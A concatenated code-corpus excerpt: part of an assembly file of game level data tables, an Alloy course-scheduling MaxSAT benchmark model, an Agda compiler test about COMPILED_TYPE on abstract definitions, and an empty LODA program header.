HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 40-21 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 60-41 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 ; 80-61 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 100-81 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b BUMP dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 120-101 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 140-121 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 160-141 dc.b HOLE dc.b BUMP dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 180-161 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 200-181 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE Column28Information ; 20-1 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 40-21 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 60-41 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 ; 80-61 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 100-81 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE ; 120-101 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 ; 140-121 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP ; 160-141 dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 180-161 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b BUMP dc.b BUMP dc.b BUMP dc.b BUMP dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 200-181 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE Column29Information ; 20-1 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 40-21 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 60-41 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 80-61 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 100-81 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE ; 120-101 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 ; 140-121 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b BUMP dc.b 0 ; 160-141 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 180-161 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b BUMP dc.b BUMP dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 200-181 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE Column30Information ; 20-1 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 40-21 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 60-41 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 80-61 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 100-81 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE ; 120-101 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 140-121 dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b BUMP dc.b BUMP dc.b BUMP dc.b BUMP dc.b 0 dc.b 0 dc.b 0 ; 160-141 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 180-161 dc.b 0 dc.b 0 dc.b 0 dc.b BUMP dc.b BUMP dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 200-181 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE Column31Information ; 20-1 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 40-21 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 60-41 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 80-61 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 100-81 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 120-101 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 140-121 dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 160-141 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 180-161 dc.b 0 dc.b BUMP dc.b BUMP dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b BUMP dc.b 0 dc.b 0 ; 200-181 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE Column32Information ; 20-1 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 40-21 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 60-41 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 80-61 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 100-81 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 120-101 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 140-121 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 160-141 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b BUMP ; 180-161 dc.b BUMP dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b 0 ; 200-181 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE ;============================== ORG $FFF6 BANKS_AND_VECTORS ;==============================

scripts/course/models_20210203/sat_60_70_3_6.als

eskang/alloy-maxsat-benchmark

0

2490

abstract sig Day {} one sig Mon, Tue, Wed, Thu, Fri extends Day {} abstract sig Time {} one sig AM, PM extends Time {} abstract sig Course { lectures: set Lecture } one sig C0,C1,C2,C3,C4,C5,C6,C7,C8,C9,C10,C11,C12,C13,C14,C15,C16,C17,C18,C19,C20,C21,C22,C23,C24,C25,C26,C27,C28,C29,C30,C31,C32,C33,C34,C35,C36,C37,C38,C39,C40,C41,C42,C43,C44,C45,C46,C47,C48,C49,C50,C51,C52,C53,C54,C55,C56,C57,C58,C59 extends Course {} fact { lectures = C0 -> MonPM + C0 -> WedPM + C1 -> MonAM + C1 -> WedAM + C2 -> MonAM + C2 -> WedAM + C3 -> MonAM + C3 -> WedAM + C3 -> FriPM + C4 -> TuePM + C4 -> TuePM + C5 -> MonAM + C5 -> WedAM + C6 -> TueAM + C6 -> ThuAM + C7 -> TueAM + C7 -> ThuAM + C8 -> TueAM + C8 -> ThuAM + C9 -> TuePM + C9 -> TuePM + C10 -> MonPM + C10 -> WedPM + C11 -> MonAM + C11 -> WedAM + C12 -> TueAM + C12 -> ThuAM + C13 -> MonAM + C13 -> WedAM + C13 -> FriPM + C14 -> MonAM + C14 -> WedAM + C15 -> TueAM + C15 -> ThuAM + C16 -> MonAM + C16 -> WedAM + C17 -> MonAM + C17 -> WedAM + C18 -> TueAM + C18 -> ThuAM + C19 -> MonAM + C19 -> WedAM + C19 -> FriPM + C20 -> MonAM + C20 -> WedAM + C21 -> MonPM + C21 -> WedPM + C22 -> MonAM + C22 -> WedAM + C22 -> FriPM + C23 -> MonAM + C23 -> WedAM + C23 -> FriPM + C24 -> MonPM + C24 -> WedPM + C25 -> TuePM + C25 -> TuePM + C26 -> MonPM + C26 -> WedPM + C27 -> TuePM + C27 -> TuePM + C28 -> MonPM + C28 -> WedPM + C29 -> MonAM + C29 -> WedAM + C30 -> TueAM + C30 -> ThuAM + C31 -> MonAM + C31 -> WedAM + C32 -> TueAM + C32 -> ThuAM + C33 -> TueAM + C33 -> ThuAM + C34 -> MonAM + C34 -> WedAM + C34 -> FriPM + C35 -> MonAM + C35 -> WedAM + C35 -> FriPM + C36 -> MonAM + C36 -> WedAM + C37 -> MonAM + C37 -> WedAM + C38 -> MonAM + C38 -> WedAM + C38 -> FriPM + C39 -> MonAM + C39 -> WedAM + C39 -> FriPM + C40 -> TuePM + C40 -> TuePM + C41 -> MonAM + C41 -> WedAM + C42 -> MonPM + C42 -> WedPM + C43 -> MonAM + C43 -> WedAM + C44 -> TuePM + C44 -> TuePM + C45 -> MonAM + C45 -> WedAM + C45 -> FriPM + C46 -> MonAM + C46 -> WedAM + C46 -> FriPM + C47 -> MonAM + C47 -> WedAM + C47 -> FriPM + C48 -> TueAM + C48 -> ThuAM + C49 -> MonPM + C49 -> WedPM + C50 -> MonPM + C50 -> WedPM + C51 -> TuePM + C51 -> TuePM + C52 -> TueAM + C52 -> ThuAM + C53 -> MonPM + C53 -> WedPM + C54 -> MonAM + C54 -> WedAM + C54 -> FriPM + C55 -> MonPM + C55 -> WedPM + C56 -> MonAM + C56 -> WedAM + C56 -> FriPM + C57 -> MonAM + C57 -> WedAM + C57 -> FriPM + C58 -> MonAM + C58 -> WedAM + C59 -> TueAM + C59 -> ThuAM } abstract sig Lecture { day: one Day, time: one Time } one sig MonAM, MonPM, TueAM, TuePM, WedAM, WedPM, ThuAM, ThuPM, FriAM, FriPM extends Lecture {} fact { day = MonAM -> Mon + MonPM -> Mon + TueAM -> Tue +TuePM -> Tue + WedAM -> Wed + WedPM -> Wed + ThuAM -> Thu + ThuPM -> Thu + FriAM -> Fri + FriPM -> Fri time = MonAM -> AM + MonPM -> PM + TueAM -> AM +TuePM -> PM + WedAM -> AM + WedPM -> PM + ThuAM -> AM + ThuPM -> PM + FriAM -> AM + FriPM -> PM } abstract sig Student { core: set Course, interests: set Course, courses: set Course } one sig S0 extends Student {} { core = C35 interests = C10 + C35 } one sig S1 extends Student {} { core = C34 interests = C18 + C40 + C42 + C8 } one sig S2 extends Student {} { core = none interests = C59 } one sig S3 extends Student {} { core = C23 interests = C21 + C21 + C5 + C7 + C23 + C0 } one sig S4 extends Student {} { core = C41 + C48 interests = C41 + C28 + C19 } one sig S5 extends Student {} { core = none interests = C53 + C8 + C27 + C2 + C6 + C14 } one sig S6 extends Student {} { core = C22 interests = C50 + C45 + C24 } one sig S7 extends Student {} { core = C11 + C6 + C49 interests = C49 + C43 + C56 + C23 + C54 } one sig S8 extends Student {} { core = C35 + C42 + C25 interests = C42 } one sig S9 extends Student {} { core = C51 interests = C50 + C50 + C26 + C27 } one sig S10 extends Student {} { core = C14 interests = C49 + C49 } one sig S11 extends Student {} { core = C8 + C4 + C20 interests = C20 + C42 } one sig S12 extends Student {} { core = C42 + C46 + C33 interests = C33 + C34 + C24 + C52 + C43 } one sig S13 extends Student {} { core = C2 + C0 interests = C0 + C5 + C55 + C26 } one sig S14 extends Student {} { core = C0 + C51 interests = C0 + C49 + C4 + C41 + C19 } one sig S15 extends Student {} { core = none interests = C57 + C43 + C26 + C53 + C3 + C2 } one sig S16 extends Student {} { core = C0 interests = C5 + C29 + C50 + C4 + C49 } one sig S17 extends Student {} { core = none interests = C11 + C23 + C29 + C59 + C21 } one sig S18 extends Student {} { core = none interests = C43 } one sig S19 extends Student {} { core = C14 + C52 + C26 interests = C26 + C19 + C52 } one sig S20 extends Student {} { core = C14 interests = C25 + C25 + C39 + C41 + C5 + C23 } one sig S21 extends Student {} { core = C47 interests = C55 + C24 + C23 + C8 + C33 } one sig S22 extends Student {} { core = C6 + C45 interests = C6 + C0 + C55 + C9 + C30 } one sig S23 extends Student {} { core = C6 interests = C9 + C11 + C20 + C44 } one sig S24 extends Student {} { core = C13 + C8 interests = C8 + C24 + C0 } one sig S25 extends Student {} { core = C15 + C3 interests = C15 + C36 + C49 + C53 } one sig S26 extends Student {} { core = C4 + C58 + C0 interests = C58 + C55 + C46 + C22 + C23 + C16 } one sig S27 extends Student {} { core = C34 interests = C7 } one sig S28 extends Student {} { core = C59 interests = C26 + C28 + C17 } one sig S29 extends Student {} { core = C20 + C15 interests = C20 + C34 + C25 + C27 } one sig S30 extends Student {} { core = C26 + C5 interests = C26 + C58 + C19 } one sig S31 extends Student {} { core = C43 + C32 + C21 interests = C43 + C21 + C26 + C28 + C55 } one sig S32 extends Student {} { core = C16 + C50 interests = C50 + C59 + C12 + C51 + C30 } one sig S33 extends Student {} { core = C59 interests = C24 + C59 + C21 + C9 + C31 + C27 } one sig S34 extends Student {} { core = none interests = C51 + C45 + C20 + C32 } one sig S35 extends Student {} { core = none interests = C39 + C9 } one sig S36 extends Student {} { core = C49 + C9 + C36 interests = C36 + C45 + C12 } one sig S37 extends Student {} { core = C28 interests = C29 + C5 + C35 + C44 + C14 + C17 } one sig S38 extends Student {} { core = C34 + C32 + C42 interests = C42 + C54 + C26 + C40 + C6 } one sig S39 extends Student {} { core = C54 interests = C21 + C36 + C10 + C15 + C33 + C38 } one sig S40 extends Student {} { core = C9 interests = C34 + C57 + C1 + C38 + C39 + C54 } one sig S41 extends Student {} { core = C34 interests = C24 } one sig S42 extends Student {} { core = C21 + C36 + C52 interests = C36 + C11 + C13 + C12 } one sig S43 extends Student {} { core = C7 interests = C20 + C55 } one sig S44 extends Student {} { core = none interests = C47 } one sig S45 extends Student {} { core = none interests = C52 + C53 + C8 + C48 } one sig S46 extends Student {} { core = C52 + C41 interests = C52 + C41 + C35 + C17 + C5 } one sig S47 extends Student {} { core = C47 + C40 + C21 interests = C40 + C11 + C45 } one sig S48 extends Student {} { core = C57 + C4 + C18 interests = C4 + C26 + C41 + C51 + C23 + C58 } one sig S49 extends Student {} { core = C22 + C10 + C12 interests = C22 + C16 + C33 + C43 } one sig S50 extends Student {} { core = C15 interests = C20 + C20 + C27 + C2 + C6 + C8 } one sig S51 extends Student {} { core = C17 + C7 + C10 interests = C10 + C18 + C15 } one sig S52 extends Student {} { core = C2 + C15 + C50 interests = C2 + C33 + C44 } one sig S53 extends Student {} { core = C47 + C49 interests = C47 + C26 + C11 + C51 } one sig S54 extends Student {} { core = C27 + C7 + C57 interests = C7 + C47 + C4 } one sig S55 extends Student {} { core = C21 + C36 interests = C36 + C16 } one sig S56 extends Student {} { core = C30 + C1 + C28 interests = C28 + C53 + C48 + C1 + C59 } one sig S57 extends Student {} { core = none interests = C49 + C38 + C35 + C41 + C28 } one sig S58 extends Student {} { core = C7 + C46 + C0 interests = C46 + C57 + C6 + C5 + C39 } one sig S59 extends Student {} { core = C34 interests = C10 + C10 + C31 + C46 + C50 + C41 } one sig S60 extends Student {} { core = C31 interests = C28 + C19 } one sig S61 extends Student {} { core = C33 interests = C26 + C36 + C2 + C48 + C50 + C1 } one sig S62 extends Student {} { core = C38 + C24 interests = C38 + C0 + C42 } one sig S63 extends Student {} { core = C14 + C42 + C48 interests = C14 + C20 + C36 } one sig S64 extends Student {} { core = C53 + C2 interests = C2 } one sig S65 extends Student {} { core = C46 + C8 + C44 interests = C8 + C35 + C51 + C13 + C26 + C20 } one sig S66 extends Student {} { core = none interests = C56 + C1 + C34 + C6 } one sig S67 extends Student {} { core = C31 + C30 interests = C31 + C38 } one sig S68 extends Student {} { core = C1 interests = C10 + C41 } one sig S69 extends Student {} { core = none interests = C57 } pred conflict[c1, c2: Course] { some l1, l2: Lecture { l1 in c1.lectures l2 in c2.lectures l1.day = l2.day l1.time = l2.time } } pred validSchedule[courses: Student -> Course] { all stu: Student { #stu.courses > 2 stu.core in stu.courses all disj c1, c2: stu.courses | not conflict[c1, c2] } } run AnySchedule { validSchedule[courses] all stu: Student | some stu.interests & stu.courses }

test/Fail/Issue2248_COMPILED_TYPE.agda

Blaisorblade/Agda

3

4580

<gh_stars>1-10 -- Andreas, 2016-10-11, AIM XXIV, issue #2248 -- COMPILED_TYPE should only work on postulates data Unit : Set where unit : Unit postulate IO : Set → Set {-# BUILTIN IO IO #-} {-# COMPILE GHC IO = type IO #-} abstract IO' : Set → Set IO' A = A doNothing : IO' Unit doNothing = unit {-# COMPILE GHC IO' = type IO #-} postulate toIO : {A : Set} → IO' A → IO A {-# COMPILE GHC toIO = \ _ x -> x #-} main : IO Unit main = toIO doNothing

oeis/257/A257235.asm

neoneye/loda-programs

11

247542

